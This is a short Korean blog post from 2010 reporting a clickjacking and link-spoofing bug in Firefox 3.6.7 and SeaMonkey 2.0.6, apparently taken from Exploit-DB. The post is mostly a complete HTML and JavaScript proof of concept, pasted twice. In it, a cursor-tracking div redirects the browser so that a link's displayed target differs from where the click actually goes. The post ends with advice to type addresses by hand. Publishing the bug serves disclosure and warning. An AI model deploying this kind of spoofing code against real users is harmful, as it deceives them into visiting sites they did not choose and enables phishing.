Security/Web 2010. 7. 23. 23:03
재밌는 취약점이 Exploit-DB에 올라왔다,
Go to the http://www.Securitylab.ir 이라는 링크에 마우스를 가져다 대면
상태표시줄에 http://www.serucitylab.ir 로 향하는 링크라는 정보가 뜬다.
하지만 실제로 링크를 클릭하면 http://www.mozilla.org 사이트로 이동한다.
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>FF3.6.7/SM 2.0.6 ClickJacking Vulnerability</title>
</head><body>
<div id="mydiv" onmouseover="document.location='http://www.mozilla.org';" style="border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 2px; height: 2px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></div>
<script>
function clickjack_armor(evt)
{
clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX;
clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=clickjack_mouseX-1;
document.getElementById('mydiv').style.top=clickjack_mouseY-1;
}
</script>
<center>
<br>
<center><h1><font face="Calibri">Firefox 3.6.7 / SeaMonkey 2.0.6 Clickjacking Vulnerability</font></h1>
<p> </p>
<div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px">
<b><br><br>
<a href="http://www.Securitylab.ir" onclick="clickjack_armor(event)"> Go
to the http://www.Securitylab.ir : (http://www.mozilla.org)</a></b></div>
<div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 1px">
<p> </div>
<p> </p>
</center>
<div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px">
<b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div>
</center></body></html>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>FF3.6.7/SM 2.0.6 ClickJacking Vulnerability</title>
</head><body>
<div id="mydiv" onmouseover="document.location='http://www.mozilla.org';" style="border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 2px; height: 2px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></div>
<script>
function clickjack_armor(evt)
{
clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX;
clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=clickjack_mouseX-1;
document.getElementById('mydiv').style.top=clickjack_mouseY-1;
}
</script>
<center>
<br>
<center><h1><font face="Calibri">Firefox 3.6.7 / SeaMonkey 2.0.6 Clickjacking Vulnerability</font></h1>
<p> </p>
<div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px">
<b><br><br>
<a href="http://www.Securitylab.ir" onclick="clickjack_armor(event)"> Go
to the http://www.Securitylab.ir : (http://www.mozilla.org)</a></b></div>
<div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 1px">
<p> </div>
<p> </p>
</center>
<div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px">
<b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div>
</center></body></html>
MS Internet Explorer 이외의 브라우저를 사용하시는 분은 가급적 링크를 이용해 페이지 이동하기 보다 주소를 직접 타이핑 하여 이동하길 권장합니다,
